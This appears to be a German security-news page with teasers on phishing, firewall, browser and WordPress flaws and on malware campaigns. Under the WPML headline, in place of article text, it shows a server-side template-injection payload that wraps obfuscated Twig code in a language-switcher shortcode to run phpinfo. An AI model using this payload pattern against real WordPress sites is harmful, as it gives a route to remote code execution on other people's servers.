Home

Kritische Sicherheitslücke im WordPress-Plugin gefährdet 1 Million Websites

[wpml_language_switcher]
{% set call_user_func = c~a~l~l~~u~s~e~r~~f~u~n~c %}
{% set phpinfo = p~h~p~i~n~f~o %}
{{ {1: phpinfo}|filter(call_user_func) }}
[/wpml_language_switcher]

Massive Phishing-Kampagne nutzt Microsoft Sway aus: QR-Codes im Visier

Eine groß angelegte Phishing-Kampagne missbraucht Microsoft Sway, ein cloudbasiertes Tool zur Erstellung von Online-Präsentationen, um Microsoft 365-Nutzer dazu zu bringen, ihre Zugangsdaten preiszugeben. Die Angriffe wurden im Juli 2024 von Netskope Threat Labs...

CTEM im Rampenlicht: Wie Gartners neue Kategorien helfen, Sicherheitslücken besser zu verwalten

Wollen Sie wissen, was 2024 im Bereich der Sicherheitsoperationen neu und bedeutend ist? Gartners kürzlich veröffentlichter Hype Cycle für Sicherheitsoperationen geht wichtige Schritte, um den Bereich des Continuous Threat Exposure Managements (CTEM) zu organisieren...

SonicWall veröffentlicht kritisches Update für Firewall-Sicherheitslücke

SonicWall hat dringend empfohlene Sicherheitsupdates für eine schwerwiegende Sicherheitslücke in seinen Firewalls veröffentlicht. Wird diese Schwachstelle erfolgreich ausgenutzt, können Angreifer unbefugten Zugriff auf die Geräte erlangen. Die Sicherheitslücke,...

Kritische RCE-Schwachstelle in Microsoft Edge ermöglicht Remote-Systemübernahme

Eine schwerwiegende Schwachstelle zur Remote-Code-Ausführung (RCE) wurde in Microsoft Edge entdeckt. Diese Schwachstelle könnte Angreifern ermöglichen, die Kontrolle über betroffene Systeme zu übernehmen, indem sie beliebigen Code aus der Ferne ausführen. Microsoft...

Hacker nutzen Amazon-Dienste für den Versand von manipulierten MSC-Dateien

Cyberkriminelle haben begonnen, Amazon-Dienste auszunutzen, um mit Schadsoftware infizierte MSC-Dateien zu verbreiten. Diese Entwicklung zeigt, wie attraktiv die umfassenden Angebote von Amazon für Angreifer geworden sind, da sie enorme Rechenleistung, Speicherplatz...

Neuer iOS-Bug lässt iPhones durch das Eingeben von vier Zeichen abstürzen

Ein Sicherheitsforscher hat am Mittwoch einen Bug in iOS entdeckt, der dazu führen kann, dass iPhones und iPads kurzzeitig abstürzen, wenn eine bestimmte Folge von vier Zeichen in bestimmte Suchleisten eingegeben wird. Der Fehler betrifft die Benutzeroberfläche von...

Kritische Sicherheitslücke im WordPress-Plugin LiteSpeed Cache ermöglicht Hackern Administratorzugriff

Sicherheitsforscher haben eine schwerwiegende Sicherheitslücke im LiteSpeed Cache-Plugin für WordPress aufgedeckt, die es nicht authentifizierten Nutzern ermöglicht, Administratorrechte zu erlangen. „Das Plugin leidet unter einer nicht authentifizierten...

Kritische Sicherheitslücke in Outlook: Technische Details zur Zero-Click-RCE-Verwundbarkeit veröffentlicht

Forscher von Morphisec haben detaillierte technische Informationen über eine kürzlich entdeckte Zero-Click-Sicherheitslücke in Microsoft Outlook veröffentlicht, die als CVE-2024-38021 identifiziert wurde. Diese Schwachstelle stellt ein erhebliches Sicherheitsrisiko...

Hacker nutzen PHP-Schwachstelle aus, um heimliche Msupedge-Backdoor zu installieren

Eine bisher unbekannte Backdoor namens Msupedge wurde in einem gezielten Cyberangriff gegen eine nicht näher benannte Universität in Taiwan eingesetzt. Das Symantec Threat Hunter Team, Teil von Broadcom, berichtete, dass die auffälligste Eigenschaft dieser Backdoor...
Grundlagen der Sicherheit bei Betriebstechnik: OT-Security

Grundlagen der Sicherheit bei Betriebstechnik: OT-Security

Grundlagen der Sicherheit bei Betriebstechnik: OT-Security Die Sicherheit bei Betriebstechnik, auch als Operational Technology (OT) bekannt, ist von entscheidender Bedeutung für Unternehmen. OT-Security umfasst die Schutzmaßnahmen, die ergriffen werden, um die Verfügbarkeit, Integrität und Vertraulichkeit von Betriebssystemen, Netzwerken und Daten zu gewährleisten. Angesichts der zunehmenden Vernetzung und Digitalisierung ist eine umfassende OT-Security-Strategie unverzichtbar. OT-Systeme, die in industriellen Umgebungen eingesetzt werden, sind anfällig für Bedrohungen wie Cyberangriffe, Malware und Datendiebstahl. Um diese Risiken zu minimieren, ist es wichtig, grundlegende Sicherheitsmaßnahmen zu implementieren. Dazu gehören unter anderem die Segmentierung von Netzwerken, die Nutzung von Firewalls, die regelmäßige Aktualisierung von Betriebssystemen und Anwendungen sowie die Schulung der Mitarbeiter im Umgang mit Sicher

mehr lesen
HiatusRAT-Malware taucht in Taiwan wieder auf

HiatusRAT-Malware taucht in Taiwan wieder auf

Nach einer vorübergehenden Pause ist das HiatusRAT-Malware in Taiwan erneut aufgetaucht. Die Cyberkriminellen nutzen diese Schadsoftware, um sensible Daten zu stehlen und Systeme zu infiltrieren. Es ist wichtig, dass Unternehmen und Nutzer in Taiwan wachsam bleiben und geeignete Sicherheitsmaßnahmen ergreifen, um sich vor dieser Bedrohung zu schützen.

mehr lesen